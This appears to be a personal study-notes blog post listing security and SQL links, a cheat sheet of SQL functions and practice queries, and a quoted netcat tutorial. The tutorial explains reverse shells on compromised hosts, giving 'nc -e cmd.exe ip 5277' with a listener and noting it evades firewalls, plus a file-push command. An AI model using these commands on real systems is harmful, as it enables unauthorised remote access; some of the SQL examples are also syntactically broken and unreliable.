2017-12-28

http://www.freebuf.com/articles/web/156483.html // linux

http://www.cnblogs.com/stayreal/p/3907206.html // to read

http://blog.csdn.net/zsf1235/article/details/50974194 //sqlMap which is very useful

http://blog.csdn.net/earbao/article/details/49633789 //nc 瑞士軍刀 //netcat

http://blog.csdn.net/zzyoucan/article/details/9235685

http://blog.csdn.net/a584226635/article/details/60757344

http://blog.csdn.net/lanzhizhuxia/article/details/7990005 // important ????????????

http://blog.csdn.net/xiong_1234/article/details/68926351 // sql easy query

http://www.cnblogs.com/stayreal/p/3906715.html // sql easy query
https://www.cnblogs.com/stayreal/p/3907206.html // sql diffcult query

sql常用函數
/*
version() database() user() currentuser()
str="abcd"
right(str,1) d
left(str,1) a
substr(str,1,1) b
replace(str,'a','A') Abcd
upper lower length len
floor(1.029) = 1
getdate() //獲取當前時間
month(date) 月 year(date) day(date)
nvl(exp1,exp2) 如果exp1為空,則返回exp2,否則返回exp1
select nvl('','A') from Job // 'A'
nvl2(exp1,exp2,exp2) exp1 != null ? exp2 : exp3
select nvl2('a','A','B')) from Job // 'A'
ascii // 返回與指定字符對應的十進制數 ascii('A') == 65
chr // 給出整數,返回字符 chr(65) = 'A'
concat // 連接字符串 //常見于sql注入??? concat('abcd','1234') = abcd1234
instr(big,small,beginIndex,times) // beginIndex big字符串開始搜索的位置 ,times 第幾次出現
select instr('oractle traning','ra',1,2) instring from Job

instring

9

rpad(str,count,ch) 在字符的右邊補充count個ch 在列的右邊粘貼字符

select lpad(rpad('gao',5,''),1,'') from Job

*gao*****

datediff(year,date,getdate())>10 // 獲取工作年數大于10的

min max count avg

having group by like not like %c%

inner join left join right join full join + table2 + on +table1.xxx = table2.xxx
//查詢員工姓名,所在部門編號和名稱
select ename,EMP.dno,DEPA.name from EMP inner join DEPA on EMP.dno = DEPA.dno
因為dno重復了,所以要寫清楚是哪個表的 EMP.dno

//查詢員工姓名,工作,領導姓名 //帶有重復字段的時候一定要加表名,不然分不清是哪個表的數據
select e1.name,e1.job,e2.name from EMP e1 inner join EMP e2 on e1.mang = e2.no

//查詢員工姓名,工作,領導名字,部門名稱
select e1.name,e1.job,e2.name DEPA.name from EMP e1 DEPA inner join EMP e2 on e1.mang = e2.no where e1.dno = DEPA.no

//查詢每個部門的員工數量
select dno,count(*) from EMP group by dno

//求出每個部分的平均工資 降序排序
select dno,avg(sal) from EMP group by dno order by desc

//求出每個部門工資大于5000的員工數目
select dno,count(*) from EMP where sal>5000 group by dno

//求出每個部門最高工資
select dno,max(sal) from EMP group by dno

//求出平均工資大于2000的部門編號和平均工資
select dno,avg(sal) from EMP group by dno having avg(sal)>2000

//求出非銷售人員外,所有從事同一工作,并且工資大于5000的員工的月工資總和,升序排列 order by //默認升序asc
select jno,sum(sal) from EMP where sal>5000 and job<>'sales' group by jno order by sum(sal)

and or union

//求出工資比7111高,與7112工作相同的員工
select * from EMP where sal>(select sal from EMP where eno=7111) and job=(select job from EMP where eno = 7112)

//求出最低工資的員工姓名,工作,工資
select ename,job,sal from EMP where sal=(select min(sal) from EMP )
*/

https://www.cnblogs.com/SnSpd/p/5926649.html // linux 常用函數 // what to do is to view common func and other
什么叫反彈端口?就是說,當對方中馬后,不用你主動和對方連接,也就是說
不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你
這樣就可以使很多防火墻失效,因為很多防火墻都不檢查出站請求的。

這里這兩個命令結合在一起后,于那兩款木馬可以說有異曲同工之效。為什么?
咳!!聽我給你講啊!!(先交100000000RMB學費)哇,別殺我啊!!)

nc -l -p 5277 (堅聽本地5277端口)

同樣也可以用

nc -l -v -p 5277

運行在本地

然后在遠程機器上,想辦法運行

nc -e cmd.exe ip 5277

(你可別真的打“ip”在肉機上啊)要打,xxx.xxx.xxx.xxx這樣!!

呵呵,看看在本地機器上出現了什么?

這樣就是反彈~~在本地機器上得到了一個SHELL

首先,在遠程機上運行命令:

nc -v -l -p 5277 > c:\pulist.exe

這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277端口

并把接受到的信息數據寫到c:\pulist.exe中

這時候在本地機上運行

nc -v -n ip 5277 < e:\hack\pulist.exe

這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內容,并把這些數據發送到ip的5277端口上

這樣遠程主機就會自動創建一個pulist.exe文件。。

fd[0]:讀管道,fd[1]:寫管道。// 0 stdin 1 stdout 2 stderr

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 229,117評論 6 537
  • 死咒
    序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 98,860評論 3 423
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 177,128評論 0 381
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,291評論 1 315
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,025評論 6 410
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,421評論 1 324
  • 城市分裂傳說
    那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,477評論 3 444
  • 雙鴛鴦連環套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,642評論 0 289
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 49,177評論 1 335
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 40,970評論 3 356
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,157評論 1 371
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,717評論 5 362
  • ?日本核電站爆炸內幕
    正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,410評論 3 347
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,821評論 0 28
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,053評論 1 289
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 51,896評論 3 395
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,157評論 2 375

推薦閱讀更多精彩內容